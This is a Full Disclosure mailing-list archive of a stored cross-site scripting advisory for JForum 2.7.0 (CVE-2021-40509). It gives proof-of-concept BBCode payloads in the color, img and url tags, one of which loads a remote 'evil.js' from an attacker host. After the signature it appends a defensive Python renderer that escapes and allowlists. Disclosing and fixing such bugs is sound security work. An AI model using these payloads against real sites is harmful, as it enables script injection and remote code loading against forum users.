Full Disclosure mailing list archives

Re: a xss vulnerability in Jforum 2.7.0


From: Henri Salo <henri () nerv fi>
Date: Tue, 7 Sep 2021 10:44:43 +0300


On Thu, Sep 02, 2021 at 04:55:24PM +0800, kun song wrote:
hi,

  I found a vulnerability in jforum 2.7.0. It is a stored cross-site
scripting vulnerability. The place is the user's profile - signature. The
technique of the vulnerability is the same as that described in this
article "STORED CROSS SITE SCRIPTING IN BBCODE" (
https://mindedsecurity.com/advisories/msa130510/), and the POC is:

color tag:
[color=red" onMouseOver="alert('xss')]XSS[/color]
[color=red" onMouseOver="$.getScript('http://192.168.45.148:8080/evil.js');"]XSS[/color]
Renders into HTML:
<font onmouseover="alert('xss')" color="red">XSS</font>
<font onmouseover="$.getScript('http://192.168.45.148:8080/evil.js');" color="red">XSS</font>

img tag:
[img]/demo.jpg" onMouseOver="alert('xss')[/img]
Renders into HTML:
<img src="/demo.jpg" onmouseover="alert('xss')" alt="image">

url= tag:
[url='http://www.demo.com"; onMouseOver="alert('xss')']test[/url]
Renders into HTML:
<a class="snap_shots" href="http://www.demo.com"; onmouseover="alert('xss')" target="_blank">test</a>

Through analysis, the forum has set the cookie to http-only, but the
attacker can use $.getScript to do some evil things.

This vulnerability has been fixed in
https://sourceforge.net/p/jforum2/code/934/ .

Timeline:
2021-04-21 Reported to the developer of Jforum by e-mail
2021-04-22 Jforum fixed the vulnerability and will include the fix in the
next release
2021-09-02 Sent this mail to bugtraq & fulldisclosure

CVE-2021-40509 has been assigned for this vulnerability.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40509

- -- 
Henri Salo
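All three payload shapes in the report work for the same reason: the BBCode renderer copies the tag argument (colour, image source, link target) into an HTML attribute without validating or escaping it, so a stray `"` closes the attribute and the rest becomes an `onmouseover` handler. The following Python renderer is an added illustration of the defensive pattern, not JForum's code and not the content of the r934 fix: colour values are allowlisted, URLs are restricted to http(s) or site-relative paths built from a conservative character set, and every text node and attribute value is HTML-escaped. The sample inputs are the advisory's three payloads plus benign uses of the same tags; the function and constant names are mine.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample inputs: the three payload shapes quoted in the advisory above,
# followed by benign uses of the same tags.
SAMPLES = [
    "[color=red\" onMouseOver=\"alert('xss')]XSS[/color]",
    "[img]/demo.jpg\" onMouseOver=\"alert('xss')[/img]",
    "[url='http://www.demo.com\"; onMouseOver=\"alert('xss')']test[/url]",
    "[color=red]plain[/color]",
    "[img]/demo.jpg[/img]",
    "[url=https://example.org/path]ok[/url]",
]

# Allowlists for attribute values: a named colour or hex triplet, and a URL drawn
# only from RFC 3986 characters minus quotes, angle brackets, whitespace and brackets.
COLOR_RE = re.compile(r"^(#[0-9a-fA-F]{3}([0-9a-fA-F]{3})?|[a-zA-Z]{1,20})$")
URL_CHARS_RE = re.compile(r"^[A-Za-z0-9._~:/?#@!$&*+,;=%()-]+$")

# The tag argument stops at the first ']', which is exactly where the payloads
# smuggle their extra attribute text.
TAG_RE = re.compile(
    r"\[color=(?P<color>[^\]]*)\](?P<ctext>.*?)\[/color\]"
    r"|\[img\](?P<img>[^\]]*)\[/img\]"
    r"|\[url=(?P<url>[^\]]*)\](?P<utext>.*?)\[/url\]",
    re.DOTALL | re.IGNORECASE,
)


def esc(text):
    """HTML-escape for both text nodes and double-quoted attribute values."""
    return html.escape(text, quote=True)


def safe_url(raw):
    """Return the URL if it is http(s) or a site-relative path built only from allowed characters, else None."""
    if not URL_CHARS_RE.match(raw):
        return None
    parts = urlsplit(raw)
    if parts.scheme:
        return raw if parts.scheme.lower() in ("http", "https") else None
    # Scheme-less: accept "/path" but not a protocol-relative "//host".
    return raw if raw.startswith("/") and not raw.startswith("//") else None


def render_tag(m):
    """Render one matched tag; an argument that fails validation drops the element and keeps only escaped text."""
    if m.group("color") is not None:
        text = esc(m.group("ctext"))
        if COLOR_RE.match(m.group("color")):
            return '<font color="%s">%s</font>' % (m.group("color"), text)
        return text
    if m.group("img") is not None:
        src = safe_url(m.group("img"))
        if src is None:
            return esc(m.group("img"))  # the would-be payload becomes inert text
        return '<img src="%s" alt="image">' % esc(src)
    href = safe_url(m.group("url"))
    text = esc(m.group("utext"))
    if href is None:
        return text
    return '<a href="%s" rel="noopener noreferrer" target="_blank">%s</a>' % (esc(href), text)


def render_bbcode(source):
    """Convert the three tags to HTML; everything else, including the gaps between tags, is escaped."""
    out, pos = [], 0
    for m in TAG_RE.finditer(source):
        out.append(esc(source[pos:m.start()]))
        out.append(render_tag(m))
        pos = m.end()
    out.append(esc(source[pos:]))
    return "".join(out)


# Regression check for the bug class: an element carrying any on* attribute.
INLINE_HANDLER_RE = re.compile(r"<[^>]*\son\w+\s*=", re.IGNORECASE)


def has_inline_handler(rendered):
    """True if any element in the rendered HTML carries an inline event handler attribute."""
    return INLINE_HANDLER_RE.search(rendered) is not None


if __name__ == "__main__":
    for s in SAMPLES:
        out = render_bbcode(s)
        print("%-62s -> %s" % (s, out))
        assert not has_inline_handler(out)
```

Run as a script it prints each sample beside its rendering: the three payloads come out as plain `XSS`, an escaped `/demo.jpg&quot; onMouseOver=...` string and plain `test`, while the benign tags render as intended. The `has_inline_handler` check is the kind of assertion worth keeping in a renderer's test suite, since it catches any future tag that reintroduces unescaped attribute interpolation.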

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
